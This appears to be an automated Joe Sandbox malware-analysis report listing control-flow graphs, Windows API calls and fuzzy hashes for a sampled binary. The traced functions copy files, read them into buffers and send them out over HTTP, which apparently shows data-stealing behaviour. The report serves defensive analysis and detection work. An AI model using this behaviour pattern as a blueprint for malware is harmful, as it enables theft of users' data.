                                                                                                                                                        control_flow_graph 339 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 362 404ee3 339->362 363 404eea-404eee 339->363 362->363 364 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 363->364 365 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 363->365 364->365 428 40500d-40501b 364->428 429 405029 428->429 430 40501d-405027 428->430 431 405033-405065 HttpOpenRequestA 429->431 430->431 432 40556b-405572 InternetCloseHandle 431->432 433 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap RtlAllocateHeap call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 431->433 432->365 587 4054ea-405514 InternetReadFile 433->587 588 405516-40551d 587->588 589 40551f-405565 InternetCloseHandle 587->589 588->589 590 405521-40555f call 416fb0 call 416ea0 call 416e00 588->590 589->432 590->587
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,04330780,?,043387A0,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,043307C0,00000000,?,04337A88,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405417
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                        • memcpy.MSVCRT ref: 00405443
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                        • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                        • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                        • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                        • API String ID: 1133489818-3705675087
                                                                                                                                                        • Opcode ID: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
                                                                                                                                                        • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                        • Opcode Fuzzy Hash: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
                                                                                                                                                        • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 598 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 613 4056d4-4056d8 598->613 614 4056cd 598->614 615 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 613->615 616 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 613->616 614->613 625 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 615->625 626 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 615->626 616->615 700 40585c-40586a 616->700 626->625 701 405878 700->701 702 40586c-405876 700->702 703 405882-4058b5 HttpOpenRequestA 701->703 702->703 704 405c63-405c6a InternetCloseHandle 703->704 705 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 703->705 704->615 814 405be2-405c0c InternetReadFile 705->814 815 405c17-405c5d InternetCloseHandle 814->815 816 405c0e-405c15 814->816 815->704 816->815 817 405c19-405c57 call 416fb0 call 416ea0 call 416e00 816->817 817->814
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,04330750), ref: 004056C3
                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,043307E0,00000000,?,04337A88,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                        • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                        • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,04330780,?,043387A0,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                        • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                        • API String ID: 148854478-1022722094
                                                                                                                                                        • Opcode ID: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
                                                                                                                                                        • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                        • Opcode Fuzzy Hash: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
                                                                                                                                                        • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1271 40a030-40a04c call 417070 1274 40a05d-40a071 call 417070 1271->1274 1275 40a04e-40a05b call 416e20 1271->1275 1281 40a082-40a096 call 417070 1274->1281 1282 40a073-40a080 call 416e20 1274->1282 1280 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1275->1280 1314 40a12d-40a134 1280->1314 1281->1280 1290 40a098-40a0b8 call 416e00 * 3 call 413220 1281->1290 1282->1280 1308 40a6cf-40a6d2 1290->1308 1315 40a170-40a184 call 416d40 1314->1315 1316 40a136-40a152 call 4170d0 * 2 CopyFileA 1314->1316 1321 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1315->1321 1322 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1315->1322 1329 40a154-40a16e call 416da0 call 415bd0 1316->1329 1330 40a16c 1316->1330 1381 40a319-40a331 call 4170d0 1321->1381 1322->1381 1329->1314 1330->1315 1389 40a680-40a692 call 4170d0 DeleteFileA call 417040 1381->1389 1390 40a337-40a355 1381->1390 1401 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1389->1401 1398 40a666-40a676 1390->1398 1399 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1390->1399 1408 40a67d 1398->1408 1402 40a372-40a382 1399->1402 1401->1308 1409 40a601-40a60e lstrlen 1402->1409 1410 40a388-40a42a call 416d40 * 6 call 417070 1402->1410 1408->1389 1412 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 1409->1412 1413 40a655-40a663 memset 1409->1413 1450 40a42c-40a43b call 416e20 1410->1450 1451 40a43d-40a446 call 416e20 1410->1451 1428 40a647-40a650 call 416e00 1412->1428 1413->1398 1428->1413 1455 40a44b-40a45d call 417070 1450->1455 1451->1455 1458 40a470-40a479 call 416e20 1455->1458 1459 40a45f-40a46e call 416e20 1455->1459 1463 40a47e-40a48e call 4170b0 1458->1463 1459->1463 1466 40a490-40a498 call 416e20 1463->1466 1467 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1463->1467 1466->1467 1467->1402
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                        • memset.MSVCRT ref: 0040A65D
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2228671196-0
                                                                                                                                                        • Opcode ID: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
                                                                                                                                                        • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                        • Opcode Fuzzy Hash: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
                                                                                                                                                        • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                        • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                          • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1973479514-0
                                                                                                                                                        • Opcode ID: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
                                                                                                                                                        • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                        • Opcode Fuzzy Hash: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
                                                                                                                                                        • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1666 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1681 404604 1666->1681 1682 40460b-40460f 1666->1682 1681->1682 1683 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1682->1683 1684 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1682->1684 1683->1684 1770 404793-404797 1683->1770 1693 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1684->1693 1694 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1684->1694 1694->1693 1771 4047a5 1770->1771 1772 404799-4047a3 1770->1772 1773 4047af-4047e2 HttpOpenRequestA 1771->1773 1772->1773 1774 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1773->1774 1775 404b7e-404b85 InternetCloseHandle 1773->1775 1886 404af2-404b1c InternetReadFile 1774->1886 1775->1684 1887 404b27-404b79 InternetCloseHandle call 416e00 1886->1887 1888 404b1e-404b25 1886->1888 1887->1775 1888->1887 1889 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1888->1889 1889->1886
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,04330750), ref: 004045FA
                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,043307A0), ref: 00404AA8
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
